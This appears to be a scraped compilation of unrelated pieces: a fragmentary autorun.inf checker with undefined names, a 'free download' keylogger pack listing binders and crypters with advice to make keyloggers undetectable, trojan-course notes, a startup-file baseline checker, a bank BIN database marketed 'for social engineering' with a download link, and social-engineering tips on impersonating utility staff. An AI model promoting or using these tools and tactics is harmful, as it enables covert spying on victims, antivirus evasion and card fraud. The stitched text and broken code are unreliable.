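# Constructed samples: a plain installer disc and one that also runs a second program.
SAMPLE_PLAIN = r"""[autorun]
open=setup.exe
icon=setup.exe
"""
SAMPLE_DISGUISED = r"""[AutoRun]
OPEN=setup.exe /silent
icon=setup.exe,0
shellexecute=extras\update.exe
shell\install\command=setup.exe
"""


def parse_autorun(text):
    """Return the [autorun] section as {lowercase key: value}.

    Hand-rolled because autorun.inf is a tiny INI file whose section and
    key names are case-insensitive; ';' starts a comment line.
    """
    entries, in_autorun = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
        elif in_autorun and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def is_launch_key(key):
    return key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command"))


def launch_directives(text):
    """(key, program) for every directive that runs a program; arguments dropped."""
    return [(key, value.split()[0]) for key, value in parse_autorun(text).items()
            if is_launch_key(key) and value]


def shown_icon_file(text):
    """The file whose icon Explorer displays for the drive (icon=file[,index])."""
    return parse_autorun(text).get("icon", "").split(",")[0].strip()


def programs_not_matching_icon(text):
    """Programs that auto-run but are not the file the user is shown."""
    icon = ntpath.basename(shown_icon_file(text)).lower()
    return sorted({prog for _, prog in launch_directives(text)
                   if ntpath.basename(prog).lower() != icon})
```

A non-empty result from programs_not_matching_icon is the case the text warns about: something runs that the user never saw.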

Remote Keyloggers Free Download | Best Keylogger Pack

Keylogger Pack

Keyloggers log everything a user does on a computer, including all keystrokes, chat conversations, applications, windows, websites, passwords, and emails.
Some even record screenshots.

They log chats from the best-known chat programs such as ICQ, Miranda, Skype, Google Talk, MSN, AIM, AOL, Yahoo and QIP.

Content:

Keyloggers:
007 Spy Software v3.873
Ardamax Keylogger v3.1
Award Keylogger v1.8
Elite Keylogger v1.0
FKWP v1.5
FUD Keylogger
Ghost Keylogger v3.80
Local Keylogger Pro v3.1
Perfect Keylogger v1.68.2
Radar Spy
SC Keylogger Pro v3.2
SpyBuddy v3.7.5
Spytech Keystroke Spy v1.10
System Keylogger v2.0

Use a binder and crypter to make your keylogger undetectable.
Binders are software used to bind or combine two or more files into one file under one name and extension. You can bind with an image, movie, song, or any file you like.

Binders:
A+ Binder
Multi File Binder
Simple Binder
Weekend Binder

Crypters:
mdCrypter
Scantime Crypter

Trojans and Backdoors - 3 : Various Trojan Genre

Various Trojan Genre


  • Remote Access Trojans

  • Password Sending Trojans

  • Keyloggers

  • Destructive

  • Denial Of Service (DoS) Attack Trojans

  • Proxy/Wingate Trojans

  • FTP Trojans

  • Software Detection Killers
Remote Access Trojans
These are the Trojans usually referred to in the media and hence highly visible, because they give the attacker the power to do more on the victim's machine than the victim sitting in front of it. Most of these Trojans combine several of the other variations discussed below.
Password Sending Trojans
These Trojans are directed towards extracting all the cached passwords, capturing other passwords entered by the victim, and emailing them to an attacker-specified mail address without the victim realizing it. The password harvest may include passwords for ICQ, IRC, FTP, HTTP or any other application that requires a user to enter a login and password. Most of them do not restart when Windows is loaded, as the objective is to gather as much information from the victim's machine as possible (passwords, mIRC logs, ICQ conversations) and mail it to the attacker.
Keyloggers
These Trojans log the keystrokes of the victim and then let the attacker search for passwords or other sensitive data in the log file. They usually come with two functions such as online and offline recording. As with the previous group, these Trojans can be configured to send the log file to a specific e-mail address on a regular basis.
Destructive
The only function of these Trojans is to destroy and delete files. They can deliberately delete core system files (for example .dll, .ini or .exe files, possibly others) on the target machine. The Trojan is activated by the attacker, or sometimes works like a logic bomb and starts on a specific day at a specific hour.
Denial of Service (DoS) Attack Trojans
These Trojans are used by attackers to mount a denial of service. A distributed denial of service may also be mounted if the attacker has gathered enough victims. WinTrinoo is a DDoS tool that has become popular recently; if the attacker has infected many ADSL users, major Internet sites could be shut down as a result.
Another variation of the DoS Trojan is the mail-bomb Trojan, whose main aim is to infect as many machines as possible and then simultaneously attack specific e-mail address(es) with random subjects and contents that cannot be filtered.
Proxy/Wingate Trojans
Underground sites are known to announce freely available proxy servers. These Trojans turn the victim's computer into a proxy/Wingate server available to the whole world or to the attacker only. It is used for anonymous Telnet, ICQ, IRC, etc., and also to register domains with stolen credit cards and for other illegal activities. This gives the attacker complete anonymity and the chance to do everything and point the trail to the victim.
FTP Trojans
These Trojans open port 21 (the port for FTP transfers) and let anybody, or just the attacker, connect to the machine. They may be password protected so that only the attacker is able to connect to the computer.
Software Detection Killers
Some Trojans have this functionality built in, but there are also separate programs that kill Zone Alarm, Norton Anti-Virus and many other popular anti-virus/firewall programs that protect the target machine. Once these are disabled, the attacker has full access to the machine to perform illegal activity or to use the computer to attack others, and often disappears afterwards.

Trojans and Backdoors - 4 : Modes of Transmission

Modes of Transmission


  • ICQ

  • IRC

  • Attachments

  • Physical Access

  • Browser And E-mail Software Bugs

  • NetBIOS (File Sharing)

  • Fake Programs

  • Un-trusted Sites And Freeware Software

  • ICQ
    People can also get infected while chatting / talking / video messaging over ICQ or any other instant messenger application. It is a risk the user undertakes when receiving files, no matter from whom or where they come.

  • IRC
    Here also, the threat comes from exchange of files no matter what they claim to be or where they come from. It is possible that some of these are infected files or disguised files.

  • Attachments
    Any attachment, even if it is from a known source should be screened as it is possible that the source was infected earlier and is not aware of it.

  • Physical Access
    Physical access to a target machine is perhaps the easiest way for an attacker to infect a machine. The motive may be a prank or just plain curiosity.

  • Browser and E-mail Software Bugs
    Having outdated applications can expose the system to malicious programs such as Trojans without any other action on behalf of the attacker.

  • NetBIOS (File Sharing)
    If port 139 is open, the attacker can install a Trojan .exe and modify a system file so that it runs the next time the system is rebooted. To block file sharing in Windows, go to: Start -> Settings -> Control Panel -> Network -> File and Print Sharing and uncheck the boxes there.

Trojans and Backdoors - 1

We will begin with:


  • Terms of reference for various malicious code

  • Defining Trojans and Backdoors

  • Understanding the various backdoor genre

  • Overview of various Trojan tools

  • Learning effective prevention methods and countermeasures

  • Overview of Anti-Trojan software

  • Learning to generate a Trojan program
Trojans and Backdoors

A Trojan horse is:

  • An unauthorized program contained within a legitimate program. This unauthorized program performs functions unknown (and probably unwanted) by the user.

  • A legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user.

  • Any program that appears to perform a desirable and necessary function but that (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.
Trojan horses can do anything that the user who executes the program on the remote machine can. This includes deleting files, transmitting to the intruder any files that can be read, changing any files that can be modified, installing other programs (such as programs that provide unauthorized network access) with the privileges the user is entitled to, and executing privilege-elevation attacks; that is, the Trojan horse can attempt to exploit a vulnerability to increase its level of access beyond that of the user running it. If this succeeds, the Trojan horse can operate with the increased privileges and go about installing other malicious code.
If the user has administrative access to the operating system, the Trojan horse can do anything that an administrator can.
A compromise of any system on a network may have consequences for the other systems on the network. Particularly vulnerable are systems that transmit authentication material, such as passwords, over shared networks in clear text or in a trivially encrypted form, which is very common.
If a system on such a network is compromised via a Trojan (or another method), the intruder may be able to record usernames and passwords or other sensitive information as it navigates the network.
Additionally, a Trojan, depending on the actions it performs, may falsely implicate the remote system as the source of an attack by spoofing and thereby cause the remote system to incur liability.

Trojans and Backdoors - 2 : Working of Trojans


  • Attacker gets access to the trojaned system as the system goes online

  • By way of the access provided by the Trojan, the attacker can stage attacks of different types.

  • Trojans work similar to the client-server model. Trojans come in two parts, a Client part and a Server part. The attacker deploys the Client to connect to the Server, which runs on the remote machine when the remote user (unknowingly) executes the Trojan on the machine. The typical protocol used by most Trojans is the TCP/IP protocol, but some functions of the Trojans may make use of the UDP protocol as well.
    When the Server is activated on the remote computer, it will usually try to remain in a stealth mode, or hidden on the computer. This is configurable - for example in the Back Orifice Trojan, the server can be configured to remain in stealth mode and hide its process. Once activated, the server starts listening on default or configured ports for incoming connections from the attacker. It is usual for Trojans to also modify the registry and/or use some other auto starting method.
    To exploit a Trojan, attackers need to ascertain the remote IP address to connect to the machine. Many Trojans have configurable features like mailing the victim's IP, as well as messaging the attacker via ICQ or IRC. This is relevant when the remote machine is on a network with dynamically assigned IP address or when the remote machine uses a dial-up connection to connect to the Internet. DSL users on the other hand, have static IPs so the infected IP is always known to the attacker.
    Most Trojans use auto-starting methods so that the server is restarted every time the remote machine reboots; the attacker is notified of this as well. As these features are countered, new auto-starting methods keep evolving. Start-up methods range from associating the Trojan with a common executable such as explorer.exe to the known methods of modifying system files or the Windows Registry. Popular auto-start locations targeted by Trojans are the Autostart folder, Win.ini, System.ini, Wininit.ini, Winstart.bat, Autoexec.bat and Config.sys; any of these can be used as an auto-starting method.
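As an added example (not from the original course material), a Python check that compares the auto-start entries in win.ini (load=, run=), system.ini (shell=) and a startup batch file such as Winstart.bat against a known-good baseline, so that an unexpected entry of the kind described above stands out. The baseline values and the sample file contents are constructed assumptions, not real system files.

```python
"""Added example: baseline check of the Windows startup files named above.
Every deviation from the baseline is a program that starts with Windows."""
import configparser
import re

# Expected values on a clean machine (assumption: explorer.exe is the stock
# shell and load=/run= are normally empty).
BASELINE = {
    ("win.ini", "windows", "load"): "",
    ("win.ini", "windows", "run"): "",
    ("system.ini", "boot", "shell"): "explorer.exe",
}
# First tokens of batch lines that only do housekeeping (heuristic allowlist).
BENIGN_BATCH_COMMANDS = {"rem", "echo", "set", "path", "prompt"}

# Constructed sample files; the server.exe path is a made-up persistence entry.
WIN_INI = r"""[windows]
load=
run=c:\windows\hidden\server.exe
"""
SYSTEM_INI = r"""[boot]
shell=Explorer.exe notepad.exe
"""
WINSTART_BAT = r"""@echo off
rem constructed sample startup batch file
path c:\windows;c:\windows\command
c:\windows\hidden\server.exe /install
"""


def ini_autostart_values(filename, text):
    """Return {(file, section, key): current value} for this file's baseline keys."""
    parser = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    parser.read_string(text)
    sections = {name.lower(): name for name in parser.sections()}  # case-insensitive lookup
    values = {}
    for entry in BASELINE:
        fname, section, key = entry
        if fname != filename:
            continue
        value = ""
        if section in sections and parser.has_option(sections[section], key):
            value = (parser.get(sections[section], key) or "").strip()
        values[entry] = value
    return values


def ini_deviations(filename, text):
    """Baseline keys whose value differs from the known-good one."""
    return [(entry, value) for entry, value in ini_autostart_values(filename, text).items()
            if value.lower() != BASELINE[entry]]


def batch_commands(text):
    """Lines of a startup batch file that launch something beyond housekeeping."""
    lines = [raw.strip().lstrip("@") for raw in text.splitlines()]
    return [line for line in lines
            if line and re.split(r"[\s=]", line.lower(), maxsplit=1)[0] not in BENIGN_BATCH_COMMANDS]
```

Registry Run keys and the Autostart folder, also named in the text, need a live Windows system to enumerate and are left out here.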

Mars Bank Database 1.1 (For Social Engineering)

Features

Banks database with search, filter and sorting possibilities. Contains 11 databases in one:
- US banks ABA numbers (25,871 records)
- US banks routing numbers (26,197 records)
- MasterCard bank identification numbers (17,297 records)
- VISA bank identification numbers (35,154 records)
- American Express bank identification numbers (1,215 records)
- US ZIP codes (70,884 records)
- US busy phones (11,784 records)
- Social Security Numbers regions (678 records)
- US Dial Area Codes (249 records)
- US states (65 records)
- UK states (114 records)

Bank Identification Number (BIN): the first 6 digits of the card number. With it you can identify any credit/debit card.

For ABA numbers, the database has this kind of data:
ABA number, bank name, bank address, bank city, bank state, bank zip, bank phone.
For routing numbers:
routing number, bank name, bank city, bank state, bank phone.
For MasterCard BINs:
BIN, bank name, bank country, bank phone.
For VISA BINs:
BIN, bank name, bank country, card type 1, card type 2, bank phone.
For American Express BINs:
BIN, bank country (always USA), card type (gold, optima, platinum...), bank phone.
For US ZIP codes:
city, state, ZIP code, county.
For US busy phones:
state, city, phone.
For SSN regions:
first 3 digits of SSN, state.
For US Dial Area Codes:
3-digit code, states where this code is used.
For US states:
state (2 letters), state full name.
For UK states:
state name, country (England, Ireland, Scotland...).

It is possible to search, filter or sort the database by any of these fields or by several fields together.
You can also add notes with some text formatting and colors; this text is auto-saved.
The program supports skins and includes 24 themes. It is also possible to use .msstyles themes.

Download

http://www.mars-soft.net/files/MarsBanksBase11.exe

Common Types of Social Engineering

Social engineering can be broken into two types: human based and computer based.

1. Human-based social engineering refers to person-to-person interaction to retrieve the desired information.

2. Computer-based social engineering refers to using computer software that attempts to retrieve the desired information.

Human-based social engineering involves human interaction in one manner or another. Computer-based social engineering depends on software to carry out the task at hand.
Gartner Group notes six human behaviors that produce a positive response to social engineering. Corroborate these with the traits discussed in module one of the course.
Reciprocation
Someone is given a "token" and feels compelled to take action.
You buy the wheel of cheese when given a free sample.
Consistency
Certain behavior patterns are consistent from person to person.
If you ask a question and wait, people will be compelled to fill the pause.
Social Validation
Someone is compelled to do what everyone else is doing.
Stop in the middle of a busy street and look up; people will eventually stop and do the same.
Liking
People tend to say yes to those they like, and also to attractive people.
Attractive models are used in advertising.
Authority
People tend to listen to and heed the advice of those in a position of authority.
"Four out of five doctors recommend...."
Scarcity
If something is in short supply, it becomes more "precious" and, therefore, more appealing.
Furbies or the Sony PlayStation 2.
Source: Gartner Research

Social Engineering Techniques: Dumpster Diving

Information that companies consider sensitive is thrown out daily in the normal garbage cans. Attackers can successfully retrieve this data by literally climbing into the company dumpsters and pilfering through the garbage. Information such as names, Social Security numbers, addresses, phone numbers, account numbers, balances, and so forth is thrown out every day somewhere. I personally know a nationally recognized movie rental company that still uses carbon paper in its fax machine. Once the roll is used up they simply throw the entire roll in the dumpster. The information on that roll is priceless, including names, addresses, account numbers, phone numbers, how much they actually pay for their movies, and so forth.

Another social engineering attack that also proves to be very successful is when an attacker dresses in the uniform of those personnel considered "honest" and "important" or even "expensive." For example, an attacker purchases or steals the uniform of a carrier, telephone, or gas or electric employee and appears carrying boxes and/or clipboards, pens, tools, etc., and perhaps even an "official-looking" identification badge or a dolly carrying "equipment." These attackers generally have unchallenged access throughout the building, as employees tend to see "through" these types of people. When is the last time you challenged one of these personnel to verify their credentials?

This attack is very risky, as the attacker can now be personally identified should he or she get caught. Again, this attack is normally very successful, so bear this in mind.